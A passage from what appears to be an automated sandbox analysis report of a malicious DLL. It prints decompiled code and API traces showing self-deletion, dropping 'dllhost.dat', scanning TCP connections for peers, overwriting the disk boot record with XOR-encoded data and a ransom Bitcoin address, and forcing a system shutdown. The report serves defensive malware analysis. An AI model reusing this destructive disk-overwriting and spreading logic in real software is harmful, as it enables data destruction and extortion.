					_v12 = _t22;
					if(_t22 != 0) {
						_t24 = HeapAlloc(GetProcessHeap(), 8, _v8); // executed
						_v16 = _t24;
						if(_t24 != 0) {
							WriteFile(_v12, _t24, _v8,  &_v8, 0); // executed
							HeapFree(GetProcessHeap(), 0, _v16);
						}
						CloseHandle(_v12);
					}
				}
				_t19 = DeleteFileW(0x11ff148); // executed
				 *0x11ff10c = _t19; // executed
				_t16 = E011E9367(); // executed
				if(_t16 != 0) {
					E011E7DEB(_a4, _a8, _a12, _a16); // executed
				}
				ExitProcess(0);
			}












    0x011e94b2
    0x011e94ba
    0x011e94c1
    0x011e958d
    0x011e958d
    0x011e94c7
    0x011e94e4
    0x011e94e9
    0x011e94eb
    0x011e94f0
    0x011e94fd
    0x011e9500
    0x011e9512
    0x011e9514
    0x011e9519
    0x011e9529
    0x011e952f
    0x011e9534
    0x011e9542
    0x011e954f
    0x011e954f
    0x011e9558
    0x011e9558
    0x011e9519
    0x011e955f
    0x011e9565
    0x011e956a
    0x011e9571
    0x011e957f
    0x011e957f
    0x011e9585

    APIs
    • FreeLibrary.KERNELBASE ref: 011E94B2
    • CreateFileW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011E94E9
    • GetFileSize.KERNEL32(00000000,00000000), ref: 011E94F4
    • CloseHandle.KERNEL32(?), ref: 011E9500
    • CreateFileW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 011E9512
    • GetProcessHeap.KERNEL32(00000008,?), ref: 011E9526
    • RtlAllocateHeap.NTDLL(00000000), ref: 011E9529
    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 011E9542
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E954C
    • HeapFree.KERNEL32(00000000), ref: 011E954F
    • CloseHandle.KERNEL32(?), ref: 011E9558
    • DeleteFileW.KERNELBASE(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E955F
      • Part of subcall function 011E9367: VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 011E93E1
      • Part of subcall function 011E9367: LoadLibraryA.KERNEL32(?), ref: 011E940B
      • Part of subcall function 011E9367: GetProcAddress.KERNEL32(00000000,011E0000), ref: 011E944E
      • Part of subcall function 011E9367: VirtualProtect.KERNELBASE(?,?,?,?), ref: 011E948E
    • ExitProcess.KERNEL32 ref: 011E9585
      • Part of subcall function 011E7DEB: WSAStartup.WS2_32(00000202,011FF768), ref: 011E7E1E
      • Part of subcall function 011E7DEB: InitializeCriticalSection.KERNEL32(011FF124,00000008,011E6C74,011E6CAA,000000FF,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7E63
      • Part of subcall function 011E7DEB: CreateThread.KERNEL32(00000000,00000000,011E7C10,00000000,00000000,00000000), ref: 011E7E99
      • Part of subcall function 011E7DEB: CreateThread.KERNEL32(00000000,00000000,011E9F8E,00000000,00000004,00000000), ref: 011E7F2B
      • Part of subcall function 011E7DEB: SetThreadToken.ADVAPI32(?,?), ref: 011E7F3B
      • Part of subcall function 011E7DEB: ResumeThread.KERNEL32(?), ref: 011E7F48
      • Part of subcall function 011E7DEB: GetLastError.KERNEL32 ref: 011E7F55
      • Part of subcall function 011E7DEB: CloseHandle.KERNEL32(?), ref: 011E7F61
      • Part of subcall function 011E7DEB: SetLastError.KERNEL32(00000057), ref: 011E7F73
      • Part of subcall function 011E7DEB: CreateThread.KERNEL32(00000000,00000000,011E7D58,?,00000004,00000000), ref: 011E7F8F
      • Part of subcall function 011E7DEB: SetThreadToken.ADVAPI32(000000FF,00000057), ref: 011E7F9F
      • Part of subcall function 011E7DEB: ResumeThread.KERNEL32(000000FF), ref: 011E7FAC
      • Part of subcall function 011E7DEB: WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 011E7FBC
      • Part of subcall function 011E7DEB: GetLastError.KERNEL32 ref: 011E7FC4
      • Part of subcall function 011E7DEB: CloseHandle.KERNEL32(000000FF), ref: 011E7FCD
      • Part of subcall function 011E7DEB: CreateThread.KERNEL32(00000000,00000000,011EA0FE,00000000,00000000,00000000), ref: 011E8006
      • Part of subcall function 011E7DEB: GetProcessHeap.KERNEL32(00000008,00000004,000000FF,?,?,?), ref: 011E8033
      • Part of subcall function 011E7DEB: HeapAlloc.KERNEL32(00000000), ref: 011E8036
      • Part of subcall function 011E7DEB: CreateThread.KERNEL32(00000000,00000000,011EA274,00000000,00000000,00000000), ref: 011E8058
      • Part of subcall function 011E7DEB: GetProcessHeap.KERNEL32(00000000,?), ref: 011E8062
      • Part of subcall function 011E7DEB: HeapFree.KERNEL32(00000000), ref: 011E8065
      • Part of subcall function 011E7DEB: Sleep.KERNELBASE(000000FF), ref: 011E807B
      • Part of subcall function 011E7DEB: Sleep.KERNELBASE(?), ref: 011E8095
      • Part of subcall function 011E7DEB: memset.MSVCRT ref: 011E80AE
      • Part of subcall function 011E7DEB: GetVersionExW.KERNEL32(?), ref: 011E80C3
      • Part of subcall function 011E7DEB: ExitProcess.KERNEL32 ref: 011E8115
      • Part of subcall function 011E7DEB: Sleep.KERNELBASE(?), ref: 011E8125
      • Part of subcall function 011E7DEB: wsprintfW.USER32 ref: 011E813B
      • Part of subcall function 011E7DEB: GetModuleHandleA.KERNEL32(ntdll.dll,00000003), ref: 011E8168
      • Part of subcall function 011E7DEB: GetProcAddress.KERNEL32(00000000,NtRaiseHardError), ref: 011E8178
      • Part of subcall function 011E7DEB: NtRaiseHardError.NTDLL(C0000350,00000000,00000000,00000000,00000006,?), ref: 011E8190
      • Part of subcall function 011E7DEB: InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 011E819E
      • Part of subcall function 011E7DEB: ExitWindowsEx.USER32(00000006,00000000), ref: 011E81AF
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E8999, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 110
    C-Code - Quality: 79%
    			E011E8999(void* __ecx, intOrPtr _a4) {
				void* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* _t21;
				WCHAR* _t24;
				WCHAR* _t28;
				char* _t29;
				void* _t32;
				long _t33;
				WCHAR* _t34;
				int _t36;
				void* _t43;
				intOrPtr _t44;
				short _t45;
				short* _t46;

				_t43 = __ecx;
				_v16 = 0;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				if(FindResourceW( *0x11ff120, 3, 0xa) == 0) {
					_t21 = 0;
				} else {
					_t21 = E011E85D0( &_v8, _t43,  &_v12, _t20); // executed
				}
				if(_t21 != 0) {
					_t24 = HeapAlloc(GetProcessHeap(), 8, 0x208);
					 *0x11ff100 = _t24;
					if(_a4 == 0) {
						__imp__SHGetFolderPathW(0, 0x23, 0, 0, _t24);
						if(0 != 0) {
							goto L13;
						} else {
							_t34 =  *0x11ff100; // 0x1442a10
							_t8 =  &(_t34[1]); // 0x1442a12
							_t46 = _t8;
							do {
								_t45 =  *_t34;
								_t34 =  &(_t34[1]);
							} while (_t45 != 0);
							_t36 = _t34 - _t46 >> 1;
							goto L10;
						}
					} else {
						_t36 = GetWindowsDirectoryW(_t24, 0x104);
						L10:
						if(_t36 == 0 || _t36 + 0xc >= 0x104) {
							L13:
							HeapFree(GetProcessHeap(), 0,  *0x11ff100);
							 *0x11ff100 =  *0x11ff100 & 0x00000000;
						} else {
							PathAppendW( *0x11ff100, L"dllhost.dat");
						}
					}
					_t28 =  *0x11ff100; // 0x1442a10
					if(_t28 != 0) {
						_t32 = E011E8946(_v12, _t28, _v8, 0); // executed
						if(_t32 != 0) {
							L18:
							_v20 = 1;
						} else {
							_t33 = GetLastError();
							_v16 = _t33;
							if(_t33 == 0x50) {
								_v16 = _v16 & 0x00000000;
								goto L18;
							}
						}
					}
					_t44 = _v12;
					_t29 = _v8;
					if(_t44 != 0) {
						do {
							 *_t29 = 0;
							_t29 = _t29 + 1;
							_t44 = _t44 - 1;
						} while (_t44 != 0);
					}
					HeapFree(GetProcessHeap(), 0, _v8);
				}
				SetLastError(_v16);
				return _v20;
			}




















    0x011e8999
    0x011e89ad
    0x011e89b0
    0x011e89b3
    0x011e89b6
    0x011e89c1
    0x011e89d2
    0x011e89c3
    0x011e89cb
    0x011e89cb
    0x011e89d6
    0x011e89ed
    0x011e89fc
    0x011e8a06
    0x011e8a1a
    0x011e8a22
    0x00000000
    0x011e8a24
    0x011e8a24
    0x011e8a29
    0x011e8a29
    0x011e8a2c
    0x011e8a2c
    0x011e8a2f
    0x011e8a32
    0x011e8a39
    0x00000000
    0x011e8a39
    0x011e8a08
    0x011e8a0a
    0x011e8a3b
    0x011e8a3d
    0x011e8a59
    0x011e8a64
    0x011e8a66
    0x011e8a46
    0x011e8a51
    0x011e8a51
    0x011e8a3d
    0x011e8a6d
    0x011e8a74
    0x011e8a7f
    0x011e8a86
    0x011e8a9a
    0x011e8a9a
    0x011e8a88
    0x011e8a88
    0x011e8a8e
    0x011e8a94
    0x011e8a96
    0x00000000
    0x011e8a96
    0x011e8a94
    0x011e8a86
    0x011e8aa1
    0x011e8aa4
    0x011e8aa9
    0x011e8aab
    0x011e8aab
    0x011e8aae
    0x011e8aaf
    0x011e8aaf
    0x011e8aab
    0x011e8aba
    0x011e8abc
    0x011e8ac0
    0x011e8acc

    APIs
    • FindResourceW.KERNEL32(00000003,0000000A,00000000), ref: 011E89B9
    • GetProcessHeap.KERNEL32(00000008,00000208,002E6710), ref: 011E89EA
    • HeapAlloc.KERNEL32(00000000), ref: 011E89ED
    • GetWindowsDirectoryW.KERNEL32(00000000,00000104), ref: 011E8A0A
    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000), ref: 011E8A1A
    • PathAppendW.SHLWAPI(dllhost.dat), ref: 011E8A51
    • GetProcessHeap.KERNEL32(00000000), ref: 011E8A61
    • HeapFree.KERNEL32(00000000), ref: 011E8A64
    • HeapFree.KERNEL32(00000000), ref: 011E8ABA
      • Part of subcall function 011E8946: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 011E8963
      • Part of subcall function 011E8946: WriteFile.KERNEL32(00000000,01442A10,?,011E8A84,00000000), ref: 011E897A
      • Part of subcall function 011E8946: CloseHandle.KERNEL32(00000000), ref: 011E898B
    • GetLastError.KERNEL32(01442A10,?,00000000), ref: 011E8A88
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E8AB7
    • SetLastError.KERNEL32(?), ref: 011E8AC0
      • Part of subcall function 011E85D0: LoadResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85E2
      • Part of subcall function 011E85D0: LockResource.KERNEL32(00000000,?,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85F2
      • Part of subcall function 011E85D0: SizeofResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8607
      • Part of subcall function 011E85D0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E861F
      • Part of subcall function 011E85D0: RtlAllocateHeap.NTDLL(00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8622
      • Part of subcall function 011E85D0: GetProcessHeap.KERNEL32(00000000,?,00000000,002F1C10,-00000004,000000C1,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?), ref: 011E8665
      • Part of subcall function 011E85D0: HeapFree.KERNEL32(00000000), ref: 011E8668
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E777B, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 86
    C-Code - Quality: 84%
    			E011E777B(intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void* _v16;
				struct HINSTANCE__* _v20;
				short _v84;
				void* __esi;
				struct HINSTANCE__* _t20;
				void* _t27;
				signed int _t29;
				void* _t41;
				intOrPtr* _t45;
				signed char* _t47;
				void* _t50;
				void* _t52;

				_t41 = 0;
				_t20 = LoadLibraryW(L"iphlpapi.dll");
				_v20 = _t20;
				if(_t20 != 0) {
					_t45 = GetProcAddress(_t20, "GetExtendedTcpTable");
					if(_t45 == 0) {
						GetLastError();
					} else {
						_v12 = 0x100000;
						_t27 = HeapAlloc(GetProcessHeap(), 8, 0x100000); // executed
						_t50 = _t27;
						_v16 = _t50;
						if(_t50 != 0) {
							_t29 =  *_t45(_t50,  &_v12, 0, 2, 1, 0); // executed
							asm("sbb ebx, ebx");
							_t41 =  ~_t29 + 1;
							if(_t41 != 0) {
								_v8 = _v8 & 0x00000000;
								if( *_t50 > 0) {
									_t7 = _t50 + 0x12; // 0x12
									_t47 = _t7;
									do {
										if( *((intOrPtr*)(_t47 - 0xe)) == 5) {
											wsprintfW( &_v84, L"%u.%u.%u.%u",  *(_t47 - 2) & 0x000000ff,  *(_t47 - 1) & 0x000000ff,  *_t47 & 0x000000ff, _t47[1] & 0x000000ff);
											_t52 = _t52 + 0x18;
											E011E6FC7( &_v84, 0, _a4);
											_t50 = _v16;
										}
										_v8 = _v8 + 1;
										_t47 =  &(_t47[0x14]);
									} while (_v8 <  *_t50);
								}
							}
							HeapFree(GetProcessHeap(), 0, _t50);
						}
					}
					FreeLibrary(_v20);
				}
				return _t41;
			}

















    0x011e7787
    0x011e7789
    0x011e778f
    0x011e7794
    0x011e77a8
    0x011e77ac
    0x011e7853
    0x011e77b2
    0x011e77ba
    0x011e77c4
    0x011e77ca
    0x011e77cc
    0x011e77d1
    0x011e77e2
    0x011e77e8
    0x011e77ea
    0x011e77eb
    0x011e77ed
    0x011e77f4
    0x011e77f6
    0x011e77f6
    0x011e77f9
    0x011e77fd
    0x011e781b
    0x011e7821
    0x011e782c
    0x011e7831
    0x011e7831
    0x011e7834
    0x011e783a
    0x011e783d
    0x011e77f9
    0x011e77f4
    0x011e784b
    0x011e784b
    0x011e77d1
    0x011e785c
    0x011e7863
    0x011e7868

    APIs
    • LoadLibraryW.KERNEL32(iphlpapi.dll), ref: 011E7789
    • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable,002E8160,00000000), ref: 011E77A2
    • GetProcessHeap.KERNEL32(00000008,00100000), ref: 011E77BD
    • RtlAllocateHeap.NTDLL(00000000), ref: 011E77C4
    • wsprintfW.USER32 ref: 011E781B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E7844
    • HeapFree.KERNEL32(00000000), ref: 011E784B
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011E7C7F), ref: 011E7853
    • FreeLibrary.KERNEL32(002E8160), ref: 011E785C
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E14A9, Relevance: 19.8, APIs: 12, Strings: 1, Instructions: 312
    C-Code - Quality: 69%
    			E011E14A9(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				void _v83;
				void _v84;
				void _v143;
				char _v144;
				void _v411;
				char _v412;
				void _v755;
				char _v849;
				void _v883;
				char _v891;
				void _v923;
				char _v924;
				char _v982;
				char _v990;
				short _v992;
				intOrPtr _v996;
				void _v1435;
				void _v1436;
				void _v1947;
				void _v1948;
				void _v2459;
				void _v2460;
				intOrPtr _t92;
				int _t101;
				void* _t103;
				intOrPtr* _t110;
				int _t111;
				void* _t112;
				void* _t114;
				unsigned int _t118;
				char* _t123;
				void* _t129;
				void* _t132;
				void* _t135;
				intOrPtr _t136;
				void* _t144;
				void* _t145;
				void* _t146;
				intOrPtr* _t147;
				intOrPtr _t150;
				void* _t157;
				signed int _t159;
				int _t160;
				void* _t161;
				signed int _t162;
				void* _t163;
				void* _t175;
				void* _t178;
				int _t179;
				unsigned int _t185;
				void* _t186;
				void* _t187;
				void* _t194;
				void* _t195;
				void* _t196;
				void* _t197;

				_t145 = __ecx;
				_v412 = 0;
				memset( &_v411, 0, 0x103);
				_v1436 = 0;
				memset( &_v1435, 0, 0x1ff);
				_v924 = 0;
				memset( &_v923, 0, 0x1ff);
				_v2460 = 0;
				memset( &_v2459, 0, 0x1ff);
				_v1948 = 0;
				memset( &_v1947, 0, 0x1ff);
				_v144 = 0;
				memset( &_v143, 0, 0x3b);
				_v84 = 0;
				memset( &_v83, 0, 0x3c);
				_t194 = _t187 + 0x54;
				_v16 = 0;
				_t92 = E011E1038( &_v412); // executed
				 *0x11ff8f8 = _t92;
				if(_t92 >= 0) {
					_t92 = E011E122D( &_v412,  &_v8); // executed
					 *0x11ff8f8 = _t92;
					if(_t92 >= 0) {
						if(_v8 != 0) {
							_t136 = 0x80070032;
							L49:
							 *0x11ff8f8 = _t136;
							return _t136;
						}
						_t92 = E011E1424(_t145,  &_v144, 0x3c); // executed
						 *0x11ff8f8 = _t92;
						if(_t92 >= 0) {
							_t146 = 0;
							do {
								_t162 = 0x3a;
								_t159 = ( *(_t186 + _t146 - 0x8c) & 0x000000ff) % _t162;
								_t146 = _t146 + 1;
								_t27 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz" + _t159; // 0x34333231
								 *((char*)(_t186 + _t146 - 0x51)) =  *_t27;
							} while (_t146 < 0x3c);
							_t92 = E011E12D5(_t146,  &_v412,  &_v1436); // executed
							 *0x11ff8f8 = _t92;
							if(_t92 >= 0) {
								_t147 =  &_v982;
								_t163 = 4;
								_t160 = 0;
								do {
									_t101 =  *_t147;
									if(_t101 != 0 && _t101 < 0xffffffff) {
										_t160 = _t101;
									}
									_t147 = _t147 + 0x10;
									_t163 = _t163 - 1;
								} while (_t163 != 0);
								if(_t160 == 0xffffffff) {
									_t160 = 0;
								}
								if(_t160 <= 0x28) {
									_t136 = 0x80070272;
									goto L49;
								}
								memcpy( &_v1948,  &_v1436, 0x80 << 2);
								_t195 = _t194 + 0xc;
								_t103 = 0;
								do {
									 *(_t186 + _t103 - 0x798) =  *(_t186 + _t103 - 0x798) ^ 0x00000007;
									_t103 = _t103 + 1;
								} while (_t103 < 0x200);
								memset( &_v2460, 7, 0x200);
								_t196 = _t195 + 0xc;
								_v924 = 0;
								_t92 = E011E1424(0,  &_v923, 0x20);
								 *0x11ff8f8 = _t92;
								if(_t92 >= 0) {
									_t92 = E011E1424(0,  &_v891, 8);
									 *0x11ff8f8 = _t92;
									if(_t92 >= 0) {
										memcpy( &_v883, "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX", 0x22);
										_t110 =  &_v84;
										_t197 = _t196 + 0xc;
										_v849 = 0;
										_t47 = _t110 + 1; // 0x1
										_t178 = _t47;
										do {
											_t150 =  *_t110;
											_t110 = _t110 + 1;
										} while (_t150 != 0);
										_t111 = _t110 - _t178;
										_t179 = _t111;
										if(_t111 != 0) {
											if(_t179 > 0x156) {
												_t179 = 0x156;
											}
											memcpy( &_v755,  &_v84, _t179);
											_t197 = _t197 + 0xc;
											 *((char*)(_t186 + _t179 - 0x2ef)) = 0;
										}
										_t112 =  *0x11fb104(0x200);
										_v12 = _t112;
										if(_t112 != 0) {
											memcpy(_t112, 0x11f8c50, 0x80 << 2);
											_t197 = _t197 + 0xc;
											_t92 = 0;
										} else {
											_t92 = 0x8007000e;
										}
										 *0x11ff8f8 = _t92;
										if(_t92 >= 0) {
											_t114 =  *0x11fb104(0x22b1);
											_v8 = _t114;
											if(_t114 != 0) {
												_v16 = 0x22b1;
												memcpy(_t114, 0x11f8e50, 0x22b1);
												_t197 = _t197 + 0xc;
												_t92 = 0;
											} else {
												_t92 = 0x8007000e;
											}
											 *0x11ff8f8 = _t92;
											if(_t92 >= 0) {
												_t118 = _v16 - (_v16 & 0x000001ff) + 0x400;
												_v20 = _t118;
												_t144 =  *0x11fb104(_t118);
												if(_t144 == 0) {
													_t136 = 0x8007000e;
													goto L49;
												}
												memcpy(_t144, _v12, 0x80 << 2);
												 *((intOrPtr*)(_t144 + 0x1b8)) = _v996;
												 *((short*)(_t144 + 0x1bc)) = _v992;
												_t123 =  &_v990;
												_t65 = _t144 + 0x1be; // 0x1be
												_t157 = _t65;
												_t161 = 4;
												do {
													asm("movsd");
													asm("movsd");
													asm("movsd");
													_t123 = _t123 + 0x10;
													_t157 = _t157 + 0x10;
													_t161 = _t161 - 1;
													asm("movsd");
												} while (_t161 != 0);
												_t67 = _t144 + 0x200; // 0x200
												memcpy(_t67, _v8, _v16);
												_t185 = _v20 >> 9;
												if(_t185 == 0) {
													_t92 = 0x80070057;
												} else {
													_t175 = 0;
													if(_t185 != 0) {
														while(1) {
															_t92 = E011E1384(_t175, _t157,  &_v412, _t144); // executed
															if(_t92 < 0) {
																goto L45;
															}
															_t175 = _t175 + 1;
															_t144 = _t144 + 0x200;
															if(_t175 < _t185) {
																continue;
															} else {
															}
															goto L45;
														}
													}
												}
												L45:
												 *0x11ff8f8 = _t92;
												if(_t92 >= 0) {
													_push( &_v924);
													_push( &_v412);
													_t129 = 0x20; // executed
													_t92 = E011E1384(_t129, _t157); // executed
													 *0x11ff8f8 = _t92;
													if(_t92 >= 0) {
														_push( &_v2460);
														_push( &_v412);
														_t132 = 0x21; // executed
														_t92 = E011E1384(_t132, _t157); // executed
														 *0x11ff8f8 = _t92;
														if(_t92 >= 0) {
															_push( &_v1948);
															_push( &_v412);
															_t135 = 0x22; // executed
															_t136 = E011E1384(_t135, _t157); // executed
															goto L49;
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t92;
			}































































    0x011e14a9
    0x011e14c4
    0x011e14cb
    0x011e14e1
    0x011e14e8
    0x011e14f9
    0x011e1500
    0x011e1511
    0x011e1518
    0x011e1529
    0x011e1530
    0x011e1542
    0x011e1549
    0x011e1558
    0x011e155c
    0x011e1561
    0x011e156b
    0x011e156e
    0x011e1573
    0x011e157a
    0x011e158b
    0x011e1590
    0x011e1597
    0x011e15a0
    0x011e15a2
    0x011e1890
    0x011e1890
    0x00000000
    0x011e1890
    0x011e15b5
    0x011e15ba
    0x011e15c1
    0x011e15c7
    0x011e15c9
    0x011e15d5
    0x011e15d6
    0x011e15d8
    0x011e15d9
    0x011e15df
    0x011e15e3
    0x011e15f6
    0x011e15fb
    0x011e1602
    0x011e160a
    0x011e1610
    0x011e1611
    0x011e1613
    0x011e1613
    0x011e1617
    0x011e161e
    0x011e161e
    0x011e1620
    0x011e1623
    0x011e1623
    0x011e1629
    0x011e162b
    0x011e162b
    0x011e1630
    0x011e1632
    0x00000000
    0x011e1632
    0x011e164d
    0x011e164d
    0x011e164f
    0x011e1651
    0x011e1651
    0x011e1659
    0x011e165a
    0x011e1670
    0x011e1675
    0x011e1681
    0x011e1688
    0x011e168d
    0x011e1694
    0x011e16a3
    0x011e16a8
    0x011e16af
    0x011e16c3
    0x011e16c8
    0x011e16cb
    0x011e16ce
    0x011e16d5
    0x011e16d5
    0x011e16d8
    0x011e16d8
    0x011e16da
    0x011e16db
    0x011e16df
    0x011e16e1
    0x011e16e3
    0x011e16ec
    0x011e16ee
    0x011e16ee
    0x011e16fc
    0x011e1701
    0x011e1704
    0x011e1704
    0x011e170d
    0x011e1713
    0x011e1718
    0x011e172d
    0x011e172d
    0x011e172f
    0x011e171a
    0x011e171a
    0x011e171a
    0x011e1731
    0x011e1738
    0x011e1744
    0x011e174a
    0x011e174f
    0x011e175f
    0x011e1762
    0x011e1767
    0x011e176a
    0x011e1751
    0x011e1751
    0x011e1751
    0x011e176c
    0x011e1773
    0x011e1782
    0x011e1788
    0x011e1791
    0x011e1795
    0x011e1797
    0x00000000
    0x011e1797
    0x011e17ab
    0x011e17b3
    0x011e17c2
    0x011e17c9
    0x011e17cf
    0x011e17cf
    0x011e17d5
    0x011e17d6
    0x011e17da
    0x011e17db
    0x011e17dc
    0x011e17dd
    0x011e17e0
    0x011e17e3
    0x011e17e4
    0x011e17e4
    0x011e17ea
    0x011e17f4
    0x011e17fc
    0x011e1806
    0x011e182e
    0x011e1808
    0x011e1808
    0x011e180c
    0x011e180e
    0x011e1818
    0x011e181f
    0x00000000
    0x00000000
    0x011e1821
    0x011e1822
    0x011e182a
    0x00000000
    0x00000000
    0x011e182c
    0x00000000
    0x011e182a
    0x011e180e
    0x011e180c
    0x011e1833
    0x011e1833
    0x011e183a
    0x011e1842
    0x011e1849
    0x011e184c
    0x011e184d
    0x011e1852
    0x011e1859
    0x011e1861
    0x011e1868
    0x011e186b
    0x011e186c
    0x011e1871
    0x011e1878
    0x011e1880
    0x011e1887
    0x011e188a
    0x011e188b
    0x00000000
    0x011e188b
    0x011e1878
    0x011e1859
    0x011e183a
    0x011e1773
    0x011e1738
    0x011e16af
    0x011e1694
    0x011e1602
    0x011e15c1
    0x011e1597
    0x011e1899

    APIs
    • memset.MSVCRT ref: 011E14CB
    • memset.MSVCRT ref: 011E14E8
    • memset.MSVCRT ref: 011E1500
    • memset.MSVCRT ref: 011E1518
    • memset.MSVCRT ref: 011E1530
    • memset.MSVCRT ref: 011E1549
    • memset.MSVCRT ref: 011E155C
      • Part of subcall function 011E1038: memset.MSVCRT ref: 011E105D
      • Part of subcall function 011E1038: memset.MSVCRT ref: 011E1071
      • Part of subcall function 011E1038: memset.MSVCRT ref: 011E10B9
      • Part of subcall function 011E1038: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 011E10E3
      • Part of subcall function 011E1038: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 011E10ED
      • Part of subcall function 011E1038: CreateFileA.KERNEL32(\\.\0:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 011E111F
      • Part of subcall function 011E1038: DeviceIoControl.KERNEL32(00000000,00560000,00000000,00000000,?,00000020,?,00000000), ref: 011E1140
      • Part of subcall function 011E1038: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 011E114A
      • Part of subcall function 011E1038: _itoa.MSVCRT ref: 011E116F
      • Part of subcall function 011E1038: memcpy.MSVCRT ref: 011E11CE
      • Part of subcall function 011E1038: memcpy.MSVCRT ref: 011E1208
      • Part of subcall function 011E1038: CloseHandle.KERNEL32(?), ref: 011E1216
      • Part of subcall function 011E122D: CreateFileA.KERNEL32(?,80100000,00000003,00000000,00000003,00000000,00000000), ref: 011E125B
      • Part of subcall function 011E122D: GetLastError.KERNEL32 ref: 011E1268
      • Part of subcall function 011E122D: DeviceIoControl.KERNEL32(00000000,00070048,00000000,00000000,?,00000090,00000000,00000000), ref: 011E1299
      • Part of subcall function 011E122D: GetLastError.KERNEL32 ref: 011E12A3
      • Part of subcall function 011E122D: CloseHandle.KERNEL32(00000000), ref: 011E12C7
      • Part of subcall function 011E1424: CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,000001FF,?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E143D
      • Part of subcall function 011E1424: GetLastError.KERNEL32(?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E1457
      • Part of subcall function 011E1424: CryptGenRandom.ADVAPI32(00000000,00000000,?,?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E1473
      • Part of subcall function 011E1424: GetLastError.KERNEL32(?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E147D
      • Part of subcall function 011E1424: CryptReleaseContext.ADVAPI32(00000000,00000000,00000000,0000003C,00000000,?), ref: 011E149A
      • Part of subcall function 011E12D5: memset.MSVCRT ref: 011E12FB
      • Part of subcall function 011E12D5: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011E1312
      • Part of subcall function 011E12D5: GetLastError.KERNEL32 ref: 011E131F
      • Part of subcall function 011E12D5: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 011E1340
      • Part of subcall function 011E12D5: ReadFile.KERNEL32(00000000,00000200,00000200,00000000,00000000), ref: 011E1354
      • Part of subcall function 011E12D5: GetLastError.KERNEL32 ref: 011E135E
      • Part of subcall function 011E12D5: CloseHandle.KERNEL32(00000000), ref: 011E1375
    • memset.MSVCRT ref: 011E1670
    • memcpy.MSVCRT ref: 011E16C3
    • memcpy.MSVCRT ref: 011E16FC
    • memcpy.MSVCRT ref: 011E1762
    • memcpy.MSVCRT ref: 011E17F4
